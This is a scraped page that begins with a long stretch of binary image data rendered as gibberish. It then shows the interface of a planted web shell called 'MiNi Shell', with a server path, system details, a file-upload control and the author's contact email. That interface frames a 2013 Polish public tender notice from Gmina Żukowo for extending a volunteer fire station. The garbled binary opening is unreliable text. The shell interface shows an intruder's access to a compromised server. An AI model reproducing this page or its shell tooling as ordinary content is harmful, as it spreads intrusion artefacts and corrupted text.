JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130529/209118-N-2013.html

<p class="kh_header"><b>Żukowo: Rozbudowa budynku OSP  w Chwaszczynie   Etap I - o pomieszczenia dla potrzeb  OSP  - boks garażowy i magazyn sprzętu przeciwpożarowego, budowę przyłącza wodociągowego na działkach 705/1 i 706/1 oraz rozbiórkę przyłącza wodociągowego na działkach 707 i 705/1.</b><br>
<b>Numer ogłoszenia: 209118 - 2013; data zamieszczenia: 29.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żukowo , ul. Gdańska 52, 83-330 Żukowo, woj. pomorskie, tel. +48 58 6858300, faks +48 58 6858300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zukowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa budynku OSP  w Chwaszczynie   Etap I - o pomieszczenia dla potrzeb  OSP  - boks garażowy i magazyn sprzętu przeciwpożarowego, budowę przyłącza wodociągowego na działkach 705/1 i 706/1 oraz rozbiórkę przyłącza wodociągowego na działkach 707 i 705/1..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rozbudowa budynku OSP  w Chwaszczynie   Etap I - o pomieszczenia dla potrzeb  OSP  - boks garażowy i magazyn sprzętu przeciwpożarowego, którego powierzchnia zabudowy  wynosi ok. 130,48 m2 , budowę przyłącza wodociągowego na działkach 705/1 i 706/1 oraz rozbiórkę przyłącza wodociągowego na działkach 707 i 705/1..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>przewiduje się realizację zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 PZP 
a)	Wartość zamówień uzupełniających nie może być wyższa niż 50% wartości zamówienia podstawowego.
b)	Wynagrodzenie za zamówienie uzupełniające będzie ustalone w oparciu   o składniki cenotwórcze zaoferowane w kosztorysie ofertowym dostarczonym Zamawiającemu przed podpisaniem umowy, a w przypadku ich braku w/w kosztorysie - wg składników cenotwórczych i cen nie wyższych niż średnia dla regionu pomorskiego za ostatni kwartał poprzedzający sporządzenie kosztorysu.
c)	Podstawą do realizacji zamówienia uzupełniającego będzie odrębna umowa, która będzie określała m.in. zakres zamówienia, termin realizacji. Okres i warunki gwarancji nie mogą być gorsze w porównaniu do zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.21.00.00-2, 45.23.13.00-8, 45.33.20.00-3, 45.33.11.00-7, 45.31.00.00-3, 45.11.12.00-0, 45.21.61.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.000,00  PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ciągu ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej  dwa zamówienia, z których każde  polegało na  rozbudowie, budowie, nadbudowie obiektu budowlanego  kubaturowego w tym  co najmniej jednego ze zrealizowanych zamówień  wartość robót budowlanych,  obejmujących  rozbudowę,  budowę, nadbudowę obiektu budowlanego kubaturowego wynosiła  nie mniej niż 300 000, 00 zł brutto,  a drugiego nie mniej niż 100.000,00 zł brutto.
W przypadku składania oferty przez dwa lub więcej podmiotów (Wykonawców wspólnie ubiegających się   o udzielenie zamówienia np. konsorcja, itp.) ocena spełnienia warunku odbędzie się łącznie przy czym wartość pojedynczego wskazanego zamówienia winna odpowiadać wyżej wymienionym kwotom.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. W przypadku gdy wykonawca korzysta z doświadczenia podmiotu trzeciego podmiot ten winien uczestniczyć w realizacji zamówienia np. w formie podwykonawstwa.
Wykonawca, który będzie korzystał z niezbędnych zasobów innych podmiotów, o których mowa wyżej, wówczas musi złożyć w ofercie wypełniony przez podmioty trzecie formularz ZOBOWIĄZANIE (zał. nr 7 do siwz).
Ocena spełnienia warunku odbędzie się na podstawie złożonego przez Wykonawcę:

- wykazu robót budowlanych  wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie  wraz z załączonymi dowodami dotyczącymi najważniejszych robót określających czy roboty  te zostały  wykonane w sposób należyty oraz czy zostały wykonane zgodnie                 z zasadami sztuki budowlanej i prawidłowo ukończone  potwierdzającym, że roboty  zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (zał. nr 5 do siwz). 
Pod pojęciem najważniejszych  robót  rozumie się roboty budowlane z zakresu  rozbudowy, budowy, nadbudowy obiektu budowlanego kubaturowego o wartości zamówienia nie mniejszej niż 100.000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje co najmniej:
1.	Kierownikiem budowy (1 osoba) - posiadającym uprawnienia do wykonywania samodzielnych funkcji w budownictwie uprawniające doi kierowania robotami  konstrukcyjno-budowlanymi
2.	Kierownikiem robót (1 osoba) - posiadającym uprawnienia do wykonywania samodzielnych funkcji w budownictwie uprawniające do kierowania robotami  budowlanymi  w zakresie instalacji elektrycznych
3.	Kierownikiem robót (1 osoba) - posiadającym uprawnienia do wykonywania samodzielnych funkcji w budownictwie uprawniające do kierowania robotami  budowlanymi w zakresie sieci i instalacji sanitarnych
4.	Brygada pracowników składająca się co najmniej z 10 robotników, którzy będą bezpośrednio  realizować zamówienie (robotnicy, operatorzy sprzętu)
5.	Uprawnienia budowlane, o których mowa powyżej powinny być zgodne z ustawą             z dnia 7 lipca 1994 r. prawo budowlane (tekst jednolity Dz. U. z  2010 r., Nr 243, poz. 1623 z późn. zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa           z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych                                w budownictwie ( Dz. U. z 2006 r., Nr 83, poz.  578 z późn. zm.). Dopuszcza się ważne i odpowiadające im uprawnienia nadane na podstawie wcześniej obowiązujących przepisów.
6.	W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia  7 lipca 1994 r. prawo budowlane, z uwzględnieniem postanowień ustawy z dnia  18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394  z późn. zm.).
7.Wykonawcy wspólnie ubiegający się o zamówienie muszą wykazać, że warunki udziału w postępowaniu określone przez zamawiającego spełniają łącznie.
8.Ocena spełnienia warunku odbędzie się na podstawie złożonego przez Wykonawcę:
a)wykaz osób, które będą uczestniczyć  w wykonywaniu zamówienia, 
b)oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane  uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pisemne zobowiązanie podmiotu udostępniającego swoje zasoby do wykonania zamówienia (jeśli dotyczy), 
2) wykaz części zamówienia, której wykonanie wykonawca powierzy podwykonawcom - jeśli dotyczy 
3) pełnomocnictwa, upoważnienia, dokument regulujący współpracę podmiotów występujących wspólnie - sposób reprezentacji np. umowy, (jeśli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany w umowie mogą dotyczyć:
1)terminu wykonania zamówienia, 
2)wysokości wynagrodzenia wykonawcy, 
3) udziału osób - kierownika budowy, 
4) udziału podwykonawców przy realizacji zamówienia,
5) technologii wykonania robót budowlanych.
2.  Zmiana terminu wykonania zamówienia może nastąpić w przypadku:
1) przerwy w realizacji robót na skutek działań podmiotów trzecich np. przedłużenie terminów wydania przez organ administracyjny lub inne podmioty wymaganych decyzji, zezwoleń, badań, ekspertyz, uzgodnień z przyczyn niezawinionych przez wykonawcę,
2)przedłużenia odbiorów przez innych gestorów sieci i urządzeń z przyczyn niezawinionych przez wykonawcę,
3) utrudniania przez właścicieli nieruchomości dostępu do nieruchomości,	
4)	konieczności wykonania robót dodatkowych / zamiennych, które będą niezbędne dla prawidłowej realizacji przedmiotu zamówienia, 
5)	warunków atmosferycznych, niszczących wykonane roboty lub uniemożliwiające kontynuację robót,
6) czasowego wstrzymania robót przez zamawiającego / inspektora nadzoru inwestorskiego z przyczyn niezależnych od wykonawcy.
3.Zmiana wysokości wynagrodzenia wykonawcy może nastąpić w przypadku:
1)odstąpienia od realizacji części zamówienia, 
2)wprowadzenia zmian w stosunku do dokumentacji projektowej w postaci prac dodatkowych, robót zamiennych / równoważnych nie wykraczających poza zakres przedmiotu zamówienia na uzasadniony wniosek wykonawcy, zamawiającego, projektanta i w sytuacji konieczności zwiększenia bezpieczeństwa realizacji robót budowlanych, usprawnienia procesu budowlanego, usunięcia wad ukrytych dokumentacji projektowej, uzyskania lepszego efektu użytkowego przedmiotu zamówienia,
3) zmiany technologii wykonania robót
4) zmiany stawki podatku VAT.
4. Zmiana udziału Podwykonawców może nastąpić w przypadku:
1)skorzystania z podwykonawców / dalszych podwykonawców w realizacji zamówienia mimo, iż w złożonej ofercie wykonawca nie przewidywał realizacji zamówienia w podwykonawstwie, 
2) zmiany zakresu robót realizowanych w podwykonawstwie.
5. Zmiana osób - kierownika budowy, kierowników robót może nastąpić w przypadku:
1)  zdarzeń losowych niezależnych od Wykonawcy,
2)  utraty uprawnień przez wskazane przez wykonawcę osoby,
3)  wykreślenia osób z  listy członków branżowej izby samorządu zawodowego.
6.W przypadku zmiany osób Wykonawca winien przedstawić Zamawiającemu nowe osoby o niegorszych kwalifikacjach i uprawnieniach w stosunku do osób, które zostały wskazane   w ofercie Wykonawcy i spełniających wymagania opisane w specyfikacji istotnych warunków zamówienia.
7. Warunki dokonywania zmian:
1) inicjowania zmian na pisemny wniosek wykonawcy lub zamawiającego,
2) uzasadnienie konieczności i wpływu zmian na realizację zamówienia: wpisy do dziennika budowy, protokoły konieczności, kosztorysy robót zamiennych, zaniechanych, dodatkowych, odniesienie do postanowień SIWZ,
3)w formie pisemnego aneksu do umowy pod rygorem nieważności takiej zmiany   z zastrzeżeniem ppkt. 4),
4) w formie pisemnego załącznika do umowy, gdzie zostaną zawarte dane podwykonawcy  (nazwa, adres), zakres zamówienia realizowany w podwykonawstwie, wysokość wynagrodzenia podwykonawcy, termin realizacji robót budowlanych / dostaw / usług.
8. W przypadku zmiany osób wykonawca winien przedstawić zamawiającemu nowe osoby  o niegorszych kwalifikacjach i uprawnieniach w stosunku do osób, które zostały wskazane w ofercie wykonawcy i spełniających wymagania opisane w specyfikacji istotnych warunków  zamówienia.
9.Zmiany zapisów umowy, które nie odnoszą się do treści oferty nie wymagają pisemnego aneksu pod rygorem nieważności. Za zmiany takie uważa się np.:
1) zmianę koordynatora za strony Zamawiającego,
2)zmianę osób nadzorujących roboty, czyli Inspektora Nadzoru,
3)zmianę rachunku bankowego, 
4)zmiany adresowe.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zukowo.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Żukowo
Ul. Gdańska 52
83-330 Żukowo
pok.13
specyfikacja jest odpłatna - koszt 86 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2013 godzina 12:00, miejsce: Urząd Gminy Żukowo
Ul. Gdańska 52
83-330 Żukowo
 Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com